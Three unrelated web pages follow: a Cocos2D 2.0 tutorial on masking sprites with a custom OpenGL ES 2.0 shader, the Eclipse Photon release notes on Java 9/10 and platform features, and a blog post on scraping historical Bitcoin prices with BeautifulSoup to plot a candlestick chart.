In the previous tutorial, we showed you how to mask a sprite with Cocos2D 1.0. This method worked OK, but it had some drawbacks – it bloated our texture memory and had a performance hit for the drawing. But with Cocos2D 2.0 and OpenGL ES 2.0, we can do this much more efficiently by writing a custom shader! This tutorial will be our first foray into the new and exciting Cocos2D 2.0 branch. You'll learn how to get started with the new Cocos2D 2.0 branch, and how to write a custom shader for a CCNode! To fully understand this tutorial, it will really help to have some basic understanding of OpenGL ES 2.0 first. If you are new to OpenGL ES 2.0, check out the OpenGL ES 2.0 for iPhone tutorial series first. Without further ado, let's get masking with shaders!

Introducing the Cocos2D 2.0 Branch

Cocos2D 2.0 is a major new version of Cocos2D that uses OpenGL ES 2.0 instead of OpenGL ES 1.0. This means some older devices that don't support OpenGL ES 2.0 can't run apps made with this branch, but most devices are OpenGL ES 2.0 compatible these days, so it's becoming more and more of a decent business decision to use it. And even though some older devices can't run it, it gives us lots of cool new things to play with, primarily OpenGL ES 2.0 shaders! And as you'll see, using shaders makes masking much more efficient. The Cocos2D 2.0 branch is still under active development, but is now available for early adopters. And that means us! :] The only way to get the Cocos2D 2.0 branch is by grabbing it from the git repository, so if you don't have git installed already, download it here. Then go to Applications\Utilities, and click on your Terminal app.
Navigate to a directory of your choosing, and then issue the following command:

git clone

Once it finishes downloading, switch to the cocos2d-iphone directory and check out the Cocos2D 2.0 branch (called gles20) as follows:

cd cocos2d-iphone
git checkout gles20

Next, go ahead and install the new Cocos2D 2.0 templates. This will overwrite your current Cocos2D templates, but that's OK – personally I just keep the 1.0 and 2.0 directories somewhere handy, and run install-templates.sh again from whichever version of Cocos2D I need the templates from.

./install-templates.sh -f -u

Back in Xcode, go to File\New\New Project, choose iOS\cocos2d\cocos2d, and click Next. Name the new project MaskedCal2, click Next, choose a folder to save the project in, and click Create. If you try to Compile and Run, you'll see… a blank screen? This threw me for a loop the first time I was playing around with the new branch. Luckily the solution is simple – the templates don't include some required files you need. To add the required files, open the cocos2d-ios.xcodeproj from where you downloaded the github repository, and drag the Resources\Shaders folder into your Xcode project. Very important: When you drag the folder over, make sure that "Copy items into destination group's folder" is selected, and "Create folder references for any added folders" is selected. By selecting the "folder references" option, the shaders files will be copied into a subdirectory of your bundle, which is where Cocos2D is looking. Compile and run, and you should see a Hello World for Cocos2D 2.0 with OpenGL ES 2.0!

Creating a Simple Cocos2D 2.0 Project

Let's get our project set up to just cycle through the list of calendar images like we did before, before we turn to masking. Like you did before, drag the resources for this project into your Xcode project. Make sure that "Copy items into destination group's folder (if needed)" is checked and "Create groups for any added folders" is selected, and click Finish.
is the same as last time. Then open up RootViewController.m and inside shouldAutorotateToInterfaceOrientation, replace the return YES with the following:

return ( UIInterfaceOrientationIsLandscape( interfaceOrientation ) );

This sets up the app to only support landscape mode (not sure why it's not set up that way in the Cocos2D 2.0 templates). This is also the same as last time. Finally make the following changes to HelloWorldLayer.m:

// BEGINTEMP
CCSprite * cal = [CCSprite spriteWithFile:spriteName];
// ENDTEMP

Yet again – same as last time (except the begintemp/endtemp positions slightly changed). So you see, the user API didn't really change much in Cocos2D 2.0 – it just has some extra awesome features you're about to see :] Compile and run, and the app should display the cycling list of calendars like before, but using Cocos2D 2.0 and OpenGL ES 2.0 now!

Shaders and Cocos2D 2.0

Cocos2D 2.0 comes with several built-in shaders that are used by default. In fact, those are the files missing from the template that you copied in earlier. Let's take a look at the shaders that are used to render a normal CCSprite. They're pretty simple. The vertex shader is Shaders\PositionTextureColor.vert:

attribute vec4 a_position;
attribute vec2 a_texCoord;
attribute vec4 a_color;

uniform mat4 u_MVMatrix;
uniform mat4 u_PMatrix;

varying vec4 v_fragmentColor;
varying vec2 v_texCoord;

void main()
{
    gl_Position = u_PMatrix * u_MVMatrix * a_position;
    v_fragmentColor = a_color;
    v_texCoord = a_texCoord;
}

This multiplies the vertex position by the projection and model/view matrices, and sets the fragment color and texture coord output varyings to the input attributes.
Next take a look at the fragment shader in Shaders\PositionTextureColor.frag:

#ifdef GL_ES
precision lowp float;
#endif

varying vec4 v_fragmentColor;
varying vec2 v_texCoord;

uniform sampler2D u_texture;

void main()
{
    gl_FragColor = v_fragmentColor * texture2D(u_texture, v_texCoord);
}

This sets the output color to the texture's color multiplied by the color value on the vertex (set in Cocos2D with setColor). Cocos2D makes it very easy to replace the shaders you use to draw a node with your own custom shaders. Let's start by creating a shader to use to implement masking, then we'll create a subclass of CCSprite and set it up to use the custom shader. In Xcode, go to File\New\New file, choose iOS\Other\Empty, and click Next. Name the new file Mask.frag, and click Save. Then click on your Project properties, select your MaskedCal2 target, select the Build Phase tab, look for Mask.frag under the "Compile Sources" tab and move it down into the "Copy Bundle Resources" section. This will make it copy the shader into your app's bundle rather than trying to compile it. (By the way, if anyone knows an easier way to make this happen let me know!) Then replace the contents of Mask.frag with the following:

#ifdef GL_ES
precision lowp float;
#endif

varying vec4 v_fragmentColor;
varying vec2 v_texCoord;

uniform sampler2D u_texture;
uniform sampler2D u_mask;

void main()
{
    vec4 texColor = texture2D(u_texture, v_texCoord);
    vec4 maskColor = texture2D(u_mask, v_texCoord);
    vec4 finalColor = vec4(texColor.r, texColor.g, texColor.b, maskColor.a * texColor.a);
    gl_FragColor = v_fragmentColor * finalColor;
}

Here we set up a new uniform for the mask texture, and read in the pixel value in the calendar texture and mask texture. Then we construct the final color as the calendar's RGB, but multiply the alpha component by the mask's alpha. So wherever the mask's alpha is 0 (transparent) the calendar will also be transparent. w00t now we've got a shader – so let's make use of it!
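As a side note, the per-pixel operation Mask.frag performs is easy to mimic outside GLSL; this little Python stand-in (mine, not from the tutorial) shows the alpha-multiply on a single RGBA pixel with components in the 0.0–1.0 range:

```python
def mask_pixel(tex_rgba, mask_rgba):
    """Per-pixel operation from Mask.frag: keep the texture's RGB,
    and multiply its alpha by the mask's alpha."""
    r, g, b, a = tex_rgba
    return (r, g, b, a * mask_rgba[3])
```

Wherever the mask's alpha is 0.0, the result is fully transparent regardless of the texture's own alpha.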
Using a Custom Shader in Cocos2D 2.0

To use a custom shader, you need to create a subclass of CCNode, set its shaderProgram to your custom shader, and (most likely) override its draw method to pass the appropriate parameters to the shader. We're going to create a subclass of CCSprite (which is fine because it derives from CCNode), and call it MaskedSprite. Let's try it out.

Go to File\New\New File, choose iOS\Cocoa Touch\Objective-C class, and click Next. Enter CCSprite for Subclass of, click Next, name the new file MaskedSprite.m, and click Save.

Replace MaskedSprite.h with the following:

#import "cocos2d.h"

@interface MaskedSprite : CCSprite {
    CCTexture2D * _maskTexture;
    GLuint _textureLocation;
    GLuint _maskLocation;
}

@end

Here we have an instance variable to keep track of the mask texture, and two variables to keep track of the texture uniform's location and the mask uniform's location.

Next switch to MaskedSprite.m and replace the contents with the following:

#import "MaskedSprite.h"

@implementation MaskedSprite

- (id)initWithFile:(NSString *)file
{
    self = [super initWithFile:file];
    if (self) {
        // 1
        _maskTexture = [[[CCTextureCache sharedTextureCache] addImage:@"CalendarMask.png"] retain];

        // 2
        self.shaderProgram = [[[GLProgram alloc] initWithVertexShaderFilename:@"Shaders/PositionTextureColor.vert"
                                                       fragmentShaderFilename:@"Mask.frag"] autorelease];
        CHECK_GL_ERROR_DEBUG();

        // 3
        [shaderProgram_ addAttribute:kCCAttributeNamePosition index:kCCAttribPosition];
        [shaderProgram_ addAttribute:kCCAttributeNameColor index:kCCAttribColor];
        [shaderProgram_ addAttribute:kCCAttributeNameTexCoord index:kCCAttribTexCoords];
        CHECK_GL_ERROR_DEBUG();

        // 4
        [shaderProgram_ link];
        CHECK_GL_ERROR_DEBUG();

        // 5
        [shaderProgram_ updateUniforms];
        CHECK_GL_ERROR_DEBUG();

        // 6
        _textureLocation = glGetUniformLocation( shaderProgram_->program_, "u_texture");
        _maskLocation = glGetUniformLocation( shaderProgram_->program_, "u_mask");
        CHECK_GL_ERROR_DEBUG();
    }
    return self;
}

@end

There's a
lot to discuss here, so let's go over it section by section.

1. Gets a reference to the texture for the calendar mask.
2. Overrides the built-in shaderProgram property on CCNode so that we can specify our own vertex and fragment shader. We use the built-in PositionTextureColor vertex shader (since nothing needs to change there) but specify our new Mask.frag fragment shader. Note that this GLProgram class is the same one from Jeff LaMarche's blog post!
3. Sets the indexes for each attribute before linking. In OpenGL ES 2.0, you can either specify the indexes for attributes yourself in advance (like you see here), or let the linker decide them for you and get them after the fact (like I've done in the OpenGL ES 2.0 tutorial series).
4. Calls shaderProgram link to compile and link the shaders.
5. Calls shaderProgram updateUniforms, which is an important Cocos2D 2.0-specific method. Remember those projection and model/view uniforms in the vertex shader? This method keeps track of where these are in a dictionary, so Cocos2D can automatically set them based on the position and transform of the current node.
6. Gets the locations of the texture and mask uniforms; we'll need them later.

Next, we have to override the draw method to pass in the appropriate values for the shaders.
Add the following method next:

-(void) draw
{
    // 1
    ccGLBlendFunc( blendFunc_.src, blendFunc_.dst );
    ccGLUseProgram( shaderProgram_->program_ );
    ccGLUniformProjectionMatrix( shaderProgram_ );
    ccGLUniformModelViewMatrix( shaderProgram_ );

    // 2
    glActiveTexture(GL_TEXTURE0);
    glBindTexture( GL_TEXTURE_2D, [texture_ name] );
    glUniform1i(_textureLocation, 0);

    glActiveTexture(GL_TEXTURE1);
    glBindTexture( GL_TEXTURE_2D, [_maskTexture name] );
    glUniform1i(_maskLocation, 1);

    // 3
#define kQuadSize sizeof(quad_.bl)
    long offset = (long)&quad_;

    // vertex
    NSInteger diff = offsetof( ccV3F_C4B_T2F, vertices);
    glVertexAttribPointer(kCCAttribPosition, 3, GL_FLOAT, GL_FALSE, kQuadSize, (void*) (offset + diff));

    // texCoords
    diff = offsetof( ccV3F_C4B_T2F, texCoords);
    glVertexAttribPointer(kCCAttribTexCoords, 2, GL_FLOAT, GL_FALSE, kQuadSize, (void*)(offset + diff));

    // color
    diff = offsetof( ccV3F_C4B_T2F, colors);
    glVertexAttribPointer(kCCAttribColor, 4, GL_UNSIGNED_BYTE, GL_TRUE, kQuadSize, (void*)(offset + diff));

    // 4
    glDrawArrays(GL_TRIANGLE_STRIP, 0, 4);
    glActiveTexture(GL_TEXTURE0);
}

Let's go over each section here as well:

1. This is boilerplate code to get things set up. It sets up the blend function for the node, uses the shader program, and sets up the projection and model/view uniforms.
2. Here we bind the calendar texture to texture unit 0, and the mask texture to texture unit 1. I discuss how this works in the OpenGL ES 2.0 Textures Tutorial.
3. CCSprite already contains the code to set up the vertices, colors, and texture coordinates for us – it stores them in a special variable called quad_. This section specifies the offset within the quad structure for the vertices, colors, and texture coordinates.
4. Finally, we draw the elements in the quad as a GL_TRIANGLE_STRIP, and re-activate texture unit 0 (otherwise texture unit 1 would be left bound, and Cocos2D assumes texture unit 0 is left active).

Almost done!
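The offset/stride bookkeeping in section 3 can be mimicked with Python's struct module (an illustration of the idea, not Cocos2D code): each interleaved vertex holds three position floats, four color bytes, and two texture-coordinate floats, so each attribute's offset is just the combined size of the fields that precede it:

```python
import struct

# Layout of one ccV3F_C4B_T2F-style vertex: 3 floats, 4 unsigned bytes, 2 floats
# ("<" = little-endian, no padding, matching a packed C struct)
VERTEX_FMT = "<3f4B2f"

stride = struct.calcsize(VERTEX_FMT)         # like kQuadSize per corner
offset_vertices = 0                          # offsetof(..., vertices)
offset_colors = struct.calcsize("<3f")       # offsetof(..., colors)
offset_texcoords = struct.calcsize("<3f4B")  # offsetof(..., texCoords)

print(stride, offset_vertices, offset_colors, offset_texcoords)  # 24 0 12 16
```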
Switch to HelloWorldLayer.m and make the following modifications:

// Add to top of file
#import "MaskedSprite.h"

// Replace code between BEGINTEMP and ENDTEMP with the following
MaskedSprite * maskedCal = [MaskedSprite spriteWithFile:spriteName];
maskedCal.position = ccp(winSize.width/2, winSize.height/2);
[self addChild:maskedCal];

That's it! Compile and run, and you now have masked sprites with Cocos2D 2.0 and OpenGL ES 2.0! The best thing about this method is that we don't have to create any extra textures – we just have the original textures and the mask texture in memory, and can create the masked version dynamically at runtime!

Where to Go From Here?

Here is a sample project with the code from the above tutorial. That's it for this tutorial series – hopefully you can start having a lot of fun with masking and Cocos2D – whichever version you choose to use! At the time of writing there isn't a lot of documentation on Cocos2D 2.0, so if you want to learn more, the best way is to look at the source and play around with the new ShaderTest example. If you want to learn more about shaders, I recommend Philip Rideout's iPhone 3D Programming – it's what I used to get started.

If you have any questions or comments, feel free to join the forum discussion below!
https://www.raywenderlich.com/4428/how-to-mask-a-sprite-with-cocos2d-2-0
Java™ development tools

Java™ 10 Support

Eclipse support for Java™ 10

The Eclipse compiler for Java (ECJ) implements the new Java 10 language enhancement: support for local variable type inference (JEP 286).

Addition of Java 10 JRE

A Java 10 JRE is recognized by Eclipse for launching. It can be added from the Window > Preferences > Java > Installed JREs > Add… page. It can be added from the Package Explorer as well, using the project's context menu. An option to set compiler compliance to 10 on a Java project is provided.

Support for var compilation

Eclipse supports compilation of var. When the type of var cannot be inferred, it is flagged as a compiler error, as expected.

Code Completion for var

Code completion is offered at places where var is allowed, and is not offered at places where var is not allowed. Hovering over var shows the Javadoc of the inferred type. A Quick Assist to convert from var to the appropriate type is provided, as is a Quick Assist to convert from a type to var.

Java™ 9 Support

Eclipse support for Java™ 9

The Eclipse compiler for Java (ECJ) implements all the new Java 9 language enhancements.

On the Contents tab, individual modules inside a container like JRE System Library can be included or excluded by moving the module from left to right or vice versa. Modules shown in the lower right box are implicitly included, because they are required by one or more modules in the upper right box. On the Details tab the encapsulation of given modules can be further influenced. The following example shows how module module.one can be made to export one of its packages to the module of the current Java project. Toggling Defines one or more modules (see above screenshot) lets you specify whether a given regular (non-modular) jar file or project should be considered as an "automatic module".
As a consequence of changes here, the entry will move to the Modulepath or Classpath accordingly.

The fix is applicable if the project is a Java 9 project and has a module-info.java file. The Quick Fix can be invoked from the editor. Before the Quick Fix is applied, the module-info file looks as below; after the Quick Fix is invoked, module-info.java is updated accordingly.

This fix is applicable if the project is a Java 9 project and has a module-info.java file. The Quick Fix can be invoked from the editor. Before the Quick Fix is applied, the module-info file looks as below; after the Quick Fix is invoked, module-info.java is updated to include requires 'MODULE_NAME'. After the Quick Fix is applied, the required import statement is added to the file reporting the error.

This Quick Fix is applicable if the project is a Java 9 project and has a module-info.java file. The Quick Fix can be invoked from the editor. When the service is a class, the Quick Fix is proposed for creating a class. When the service is an interface or an annotation, two Quick Fixes are proposed, for creating a class or an interface.

A new --release option is available on the Java compiler preference page. The --release option is used for Default Access rules and the EE descriptor.

Paste module-info.java code in Package Explorer

You can now paste a snippet of code representing module-info.java directly into a source folder to create a module-info.java file. For example, copy this code:

import java.sql.Driver;

module hello {
    exports org.example;
    requires java.sql;
    provides Driver with org.example.DriverImpl;
}

Then, select a source folder in a Java 9 project in the Package Explorer view and use Ctrl+V (Edit > Paste) to paste it. This automatically creates a module-info.java file in the source folder with the copied content.

Content assist for module declaration name

Content assist (Ctrl+Space) support is now available for the module declaration name.
Quick Fix for unresolved module on module name in requires directive

A new Quick Fix is offered on requires statements in the module-info.java file to fix issues that are reported due to an unresolved module. The Quick Fix below is provided if the entry related to the unresolved-module error has been added to the classpath and not to the module path.

Quick Fix for non-existing or empty package on exports directive

A new Quick Fix is available when you have a non-existing or an empty package in an exports directive in the module-info.java file. This Quick Fix is applicable if the project is a Java 9 project or above and has a module-info.java file. The Quick Fix can be invoked from the editor. A Quick Fix is provided to create either a Class, an Interface, an Annotation, or an Enum in the given package. If the package does not exist, a new package is created and the new element is created in that package.

Creation of module-info.java file on creation of a new Java 9 project

When creating a Java project with compliance Java 9 or above, a new option is offered for the creation of the module-info.java file. A new checkbox has been added in the Java Settings page (Page 2) of the New Java Project wizard. The new checkbox for the creation of the module-info.java file is checked by default. When this checkbox is checked, upon project creation, the dialog for creation of a new module-info.java file will appear. Selecting Don't Create in that dialog does not create the module-info.java file, but still creates the project.

Overriding modular build path dependencies for launching

Based on the Java build path, a Java 9 module can have command line options. These options from the build path can be overridden for launching programs in the module. An Override Dependencies button has been added to the Dependencies tab; its dialog can be used to override modular dependencies.

JUnit

Eclipse support for JUnit 5.1.
Java Editor

Quick Fix to add @NonNullByDefault to packages

A new Quick Fix is offered to fix issues that are reported when the Missing '@NonNullByDefault' annotation on package warning is enabled. If the package already has a package-info.java, the Quick Fix can be invoked from the editor. Otherwise, the Quick Fix must be invoked from the Problems view, and will create a package-info.java with the required annotation.

Test source folders and dependencies are shown with a darker icon in the build path settings, the Package Explorer and other locations. This can be disabled in Preferences > Java > Appearance.

The first '.' is the special regex character, while the second '.' is escaped to denote that this is a normal character.

@NonNullByDefault per module

If a module is annotated with @NonNullByDefault, the compiler will interpret this as the global default for all types in this module:

@org.eclipse.jdt.annotation.NonNullByDefault
module my.nullsafe.mod { …

Note, however, that this requires an annotation type declared with target ElementType.MODULE. Since the annotation bundle org.eclipse.jdt.annotation is still compatible with Java 8, it cannot yet declare this target. In the interim, a preview version of this bundle with support for modules will be published by other means than the official SDK build.

@NonNullByDefault improvements

Support for @NonNullByDefault annotations that are targeted at parameters has been implemented. Multiple different @NonNullByDefault annotations (especially with different default values) may be placed at the same target, in which case the sets of affected locations are merged. Annotations which use a meta annotation @TypeQualifierDefault instead of a DefaultLocation-based specification are now understood too, e.g. @org.springframework.lang.NonNullApi.
Version 2.2.0 of bundle org.eclipse.jdt.annotation contains an annotation type NonNullByDefault that can be applied to parameter and module declarations (in addition to the previously allowed targets).

Test sources

There is now support for running Java annotation processors on test sources. The output folder for files generated for these can be configured in the project properties in Java Compiler > Annotation Processing as Generated test source directory.

Debug

Launch configuration prototypes for Java Launch Configurations

A Java Launch Configuration can now be based on a prototype. A prototype seeds attributes in its associated Java Launch Configurations with the settings specified in the Prototype tab.

Advanced source lookup implementation

A new Enable advanced source lookup preference option is available. Similarly, when an exception breakpoint is hit, the exception being thrown is shown.

JDT Developers

Package binding with recovery

The existing method IBinding#getJavaElement() now accommodates recovered packages, in which case null may be returned for such package bindings with problems. Pre-Java 9 compliant code will continue to have a non-null return value for this API for packages.

Support for Regex Module Declaration Search

The existing method SearchPattern#createPattern(String, int, int, int) is enhanced to support regular expression search for module declarations. Please note that the flag SearchPattern#R_REGEXP_MATCH used for regular expression search is applicable exclusively to module declarations. No other flag (e.g. SearchPattern#R_CASE_SENSITIVE) should be used in conjunction with this match rule.
PHP Development Tools

General

- Fixed support for ASP tags

Editor

- Async code completion
- Improved code assist for @var tags
- Fixed highlighting for projects with duplicated classes in validation paths
- Fixed memory leak in PHP editors
- Improved superglobal highlighting
- Fixed highlighting for the parent keyword
- Method overriding support
- PHP 7 return types
- Consistent tooltip for constants defined via define and const keywords
- Improved highlighting for try/catch/finally statements

Formatter

- Formatter preferences always use the latest supported PHP version
- Support for braces configuration for traits
- Stable formatter results
- New "Line Wrapping" option "Keep trailing comma"
- Formatter no longer produces "TextEdits" in places where code isn't really touched

Platform

Windows

Improved Tree and Table widget scaling at high DPI on Windows

Trees and Tables scale checkboxes and expand/collapse buttons properly.

Dropped support for Windows XP

Eclipse/SWT has dropped support for the Windows XP operating system and other Windows versions older than Windows Vista. Microsoft support for Windows XP, including security updates, ended in April 2014, and Windows XP has not been listed as a target environment for the Eclipse Platform for several years.

MacOS

Improved readability of default text font on macOS

Reading source code is the task developers perform the most during coding, so text editors must assist the user as well as possible with that. On macOS, Eclipse Photon now uses the "Menlo" font as the default text font, which also contains bold font faces. This increases readability in source code editors using bold font faces.

Dark buttons on Mac

The background color of a button can now be styled on the Mac. This is used to style the buttons in the dark theme.

GTK3

Improved caret performance on GTK3

Caret performance on the SWT GTK3 port has been enhanced to allow for smoother drawing.
Previously the caret stuttered when moved or when other controls in the same shell were manipulated. Now the caret moves smoothly and blinks at a consistent rate.

Accessibility support on GTK3

Significant improvements have been made in the accessibility support of the SWT Linux/GTK3 port. Users are able to use assistive technologies seamlessly with SWT GTK3, just as they were able to with GTK2, and without any hangs or crashes.

GTK_THEME override support for SWT-GTK3

Eclipse SWT on GTK3.14+ now supports the use of GTK_THEME as an environment variable. SWT applications are correctly styled when using the GTK_THEME environment variable to override the system theme, and/or to specify a dark variant. Below are the before and after screenshots of ControlExample running with GTK_THEME=Adwaita:dark set.

Editors

Manage associations of content types with editors

The Content Types preference page was extended to allow viewing, creating and removing associations with editors. Using the content type to define an editor association is preferred over using the File Associations preferences.

Associate content type with a file name pattern

From the Preferences > General > Content Types preference page, you can now associate a content type with a file name pattern and use ? or * wildcards at any place in that pattern (to match any character or any string, respectively).

Browser Editor can toggle auto-refresh

The Browser Editor now contains a drop-down option for enabling auto-refresh for local pages. When enabled, the Browser Editor will automatically refresh if the opened file is edited and saved.

CodeMining support with SourceViewer

A code mining represents content (e.g. labels, icons) that should be shown along with the source text, like the number of references, a way to run tests (with run/debug icons), etc.
The main goal of code mining is to help developers better understand the code they are reading or writing. A code mining is represented by org.eclipse.jface.text.codemining.ICodeMining; instances are provided by an org.eclipse.jface.text.codemining.ICodeMiningProvider. The org.eclipse.jface.text.source.ISourceViewerExtension5 interface provides the capability to register org.eclipse.jface.text.codemining.ICodeMiningProvider instances and to update code minings. The example CodeMiningDemo draws class references/implementations code minings.

Dark Theme

Improved text operation icons for the dark theme

The block selection, word wrap and show whitespace icons have been adjusted to look good in the dark theme.

Improved popup dialogs for the dark theme

Popup dialogs, as for example the platform's update notification popup, now use a dark background and a light foreground color in the dark theme.

Improved text color in text editor for the dark theme

The text editor now uses an improved font color in the dark theme for better readability.

Improved coloring of links in code element information in the dark theme

The colors of links in code element information controls now take the color settings of the "Hyperlink text color" and the "Active hyperlink text color" from the "Colors & Fonts" preference page into account. The readability in the dark theme has been improved a lot by this.

Improved the text editor's expand and collapse nodes for the dark theme

The collapse and expand nodes in the text editor's left-hand side ruler were improved for the dark theme.

Improved the generic editor's mark occurrences annotation color for the dark theme

The occurrences annotation marker color in the generic editor's left-hand side ruler was improved for the dark theme.

Canvas elements are styled in the default dark theme

The default dark theme now contains CSS for styling Canvas elements by default.
Old: New: Other Open resource dialog highlights matching characters The matching characters from the filter are now highlighted in the Open Resource dialog. Import/export preferences from preference dialog Easily accessible buttons for opening the Import/Export preferences wizards have been added to the lower left corner of the Preferences dialog. The wizards are still accessible through the File > Import… and File > Export… wizards. Expanded Highlighting in Open Resource Dialog The Open Resource dialog now shows you how the search term matches the found resources by highlighting the names based on camel-case and pattern ( * and ? ) searches. Undo/Redo Toolbar Buttons The main toolbar can now show Undo and Redo buttons. The buttons are not available by default. They can be added via Window > Perspective > Customize Perspective…: QuickAccess matches Preference pages by keyword QuickAccess ( Ctrl+3) now also returns Preference pages that have a keyword matching user input. Perfect matches appear first in selection dialogs Within selection dialogs, including Open Type and Open Resource, perfect matches appear as the first result, ensuring that users no longer have to scroll through historical matches and the alphabetically sorted list to find their desired result. Delete nested projects The Delete Resources dialog now shows a Delete nested projects option to delete all projects whose location on file system is a descendant of one of the selected projects. Debug perspective layout changed Default Debug perspective layout changed, see screenshot below. The aim is to give the editor area more space and to show more relevant information without scrolling. Display view, Expressions view and Project Explorer are now shown by default, Problems view replaces Tasks. Workers use job names as thread names The jobs framework now uses Job names for Worker thread names. 
Previously all running Workers got enumerated thread names, without any hint of what the current Worker is actually doing. Now the Job name is added next to the Worker name.

Right click option to export Launch Configurations

The Export Launch Configurations Wizard is now accessible through the right-click menu on Launch Configurations. This wizard is still available via File > Export > Run/Debug > Launch Configurations.

Flat layout in tabbed properties view

In the light theme, the tabbed properties view now completely uses the same flat styling as the form-based editors do.

Open/Close Projects by Working Set in Project Explorer

The ability to Open, Close, Close Unrelated, and Build all appropriate projects in a Working Set has been added to the right-click menu of Working Sets in the Project Explorer.

Modify project natures

The Project Properties dialog now features a page to add or remove natures on a project. As mentioned on the page, some natures may not properly handle manual addition/removal, so using this can lead to some inconsistencies in those cases.

Possibility to configure the color of text editor's range indicator

The text editor's range indicator's color can now be configured via the Colors and Fonts preference page.

Styling for text editor's range indicator

The Eclipse default dark theme now includes styling for the text editor's range indicator.

Allow workspace to build projects in parallel

The Workspace preference page now has a new option to allow the workspace to build projects in parallel. Under some safe circumstances, the workspace can now choose to build independent projects in parallel. In that case, the maximum number of jobs/threads that will be running builds in parallel is controlled by this preference. A value of 1 indicates that the build won't be parallelized, keeping the legacy behavior. The optimal value will depend on the machine and on the specifics of the workspace's projects.
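The scheduling idea behind this preference can be sketched in a few lines of Python (an illustration only, not Eclipse's implementation): independent projects go to a bounded worker pool, and a dependent project waits for its prerequisites to finish before building:

```python
from concurrent.futures import ThreadPoolExecutor

# Toy dependency graph, listed in dependency order (Eclipse derives this
# from project references in the workspace).
DEPS = {"core": [], "ui": ["core"], "tests": ["core", "ui"], "docs": []}

def build_all(deps, max_jobs=4):
    """Build every project, never starting one before its prerequisites."""
    finished_order = []
    futures = {}
    with ThreadPoolExecutor(max_workers=max_jobs) as pool:
        def build(project):
            for dep in deps[project]:
                futures[dep].result()       # block until the prerequisite is built
            finished_order.append(project)  # list.append is atomic in CPython
        for name in deps:                   # submit in dependency order
            futures[name] = pool.submit(build, name)
        for fut in futures.values():
            fut.result()                    # propagate any build errors
    return finished_order

order = build_all(DEPS)
print(order.index("core") < order.index("ui") < order.index("tests"))  # True
```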
The recommendation is to first try relatively low values (such as 4), which saves time when the projects permit it while not risking CPU overload.

Refresh on access on by default

For years the Eclipse IDE has shipped with a customization that files are automatically refreshed when the user accesses them. Other Eclipse-based tools like the Spring Tool Suite were missing this customization; now they do not have to manually instruct their IDE to pick up the update.

Open resource dialog always shows the paths

You can now use the Open Resource dialog to see the file paths. Previously it only showed the paths if there were duplicate entries.

Open Source Projects

The following Eclipse open source projects participated in this release.

- Eclipse Accessibility Tools Framework
- Eclipse Business Intelligence and Reporting Tools
- Eclipse C/C++ Development Tools: New in CDT 9.5
- Eclipse Code Recommenders
- Eclipse Communication Framework
- Eclipse Data Tools Platform
- Eclipse Dynamic Languages Toolkit
- Eclipse Extended Editing Framework
- Eclipse Generation Factories
- Eclipse Git Team Provider
- Eclipse Graphical Editing Framework
- Eclipse Java development tools: New features for Java developers
- Eclipse Java Workflow Tooling
- Eclipse JavaScript Development Tools
- Eclipse Lua Development Tools
- Eclipse Marketplace Client Project
- Eclipse Maven Integration for Web Tools Platform
- Eclipse Modeling Workflow Engine
- Eclipse Packaging Project
- Eclipse Parallel Tools Platform
- Eclipse PHP Development Tools: New in 6.0
- Eclipse Platform: New features in the Platform, New APIs in the Platform and Equinox
- Eclipse Plug-in Development Environment: New features for plug-in developers
- Eclipse Presentation Modeling Framework
- Eclipse Remote Application Platform
- Eclipse Target Communication Framework
- Eclipse Target Management
- Eclipse Tools for Cloud Foundry
- Eclipse Web Tools
Platform Project
http://www.eclipse.org/photon/noteworthy/index.php
Scraping websites for historical Bitcoin data using Python

In this post we will be scraping websites (coinmarketcap.com) for historical Bitcoin data using BeautifulSoup and Python. Furthermore, the data is processed and put into a Pandas dataframe. After that, the historical Bitcoin data is used to plot a candlestick graph.

Scraping websites for data

First of all, web scraping techniques are used to extract data from websites. This is helpful in case no API is provided to receive data from a website. Websites are built on HTML, therefore we need to extract our data from HTML code. Here, we are using Python and the powerful library BeautifulSoup. BeautifulSoup is probably one of the best libraries to pull data out of HTML files. You can view the HTML code in any browser, for instance in Firefox: Firefox > Web Developer > Page Source.

Scraping coinmarketcap.com

In the following, we are going to scrape the historical Bitcoin data (date, open, high, low, close, volume, market_cap) from coinmarketcap.com.

Python Code

First, let us have a look at the HTML snippet we are going to process. After that, let us have a look at the necessary steps:

- First provide a link to the target website.
- Connect to the server and pull the HTML data.
- Select the section of interest, here it is 'table-responsive'. Afterwards, search for the desired table rows ('tr').
- Loop over the rows, extract the .text data and put it into a temporary list (tmp). After that, we remove unnecessary commas from the data and transform the date string into a datetime object. Furthermore, strings are transformed into floats since they are numbers.
- Make a pandas dataframe (df) from the list (data).

You can view and download the entire Python code in this Github repository.

Results

The main result of the proposed method is a Pandas dataframe with all desired data. Hence, it contains the date as a datetime object, the prices (open, high, low, close), the volume and the market capitalization.
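The steps above can be sketched end-to-end. The post itself uses BeautifulSoup; to keep this sketch self-contained it uses only the standard library html.parser, and the two-column table below is toy data, not coinmarketcap's real markup:

```python
from datetime import datetime
from html.parser import HTMLParser

class TableScraper(HTMLParser):
    """Collect the text of every <td> cell, grouped by table row ('tr')."""
    def __init__(self):
        super().__init__()
        self.rows, self._row, self._in_td = [], None, False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag == "td":
            self._in_td = True

    def handle_endtag(self, tag):
        if tag == "tr" and self._row:
            self.rows.append(self._row)
            self._row = None
        elif tag == "td":
            self._in_td = False

    def handle_data(self, data):
        if self._in_td and self._row is not None:
            self._row.append(data.strip())

html = ("<table><tr><td>Apr 01, 2018</td><td>6,816.74</td></tr>"
        "<tr><td>Apr 02, 2018</td><td>7,083.80</td></tr></table>")
scraper = TableScraper()
scraper.feed(html)

# Remove commas, parse dates into datetime objects, convert prices to floats
data = [(datetime.strptime(d, "%b %d, %Y"), float(p.replace(",", "")))
        for d, p in scraper.rows]
print(data[0][0].year, data[0][1])  # 2018 6816.74
```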
Afterwards, we can use the data within the dataframe to plot a candlestick chart. Now, let's have a look at the Python code for the candlestick chart.

import plotly as pyo
from plotly.tools import FigureFactory as FF

fig = FF.create_candlestick(df['open'], df['high'], df['low'], df['close'], dates=df['date'])
fig['layout'].update({
    'title': 'Bitcoin price development',
    'yaxis': {'title': 'Bitcoin in USD'}
})
pyo.offline.plot(fig)

Finally, here you go with the Bitcoin candlestick chart. Furthermore, you can also use the scraped historical data to perform Monte Carlo simulations.

Conclusion

We can use the Python library BeautifulSoup to parse the HTML code of websites and pull data from it. This is also called scraping websites. Furthermore, we can transform this data into the desired data formats (datetime and floats). For instance, we used the data to plot a candlestick chart.

What do you think?

I'd like to hear what you think about this post. Let me know by leaving a comment below and don't forget to subscribe to this blog!
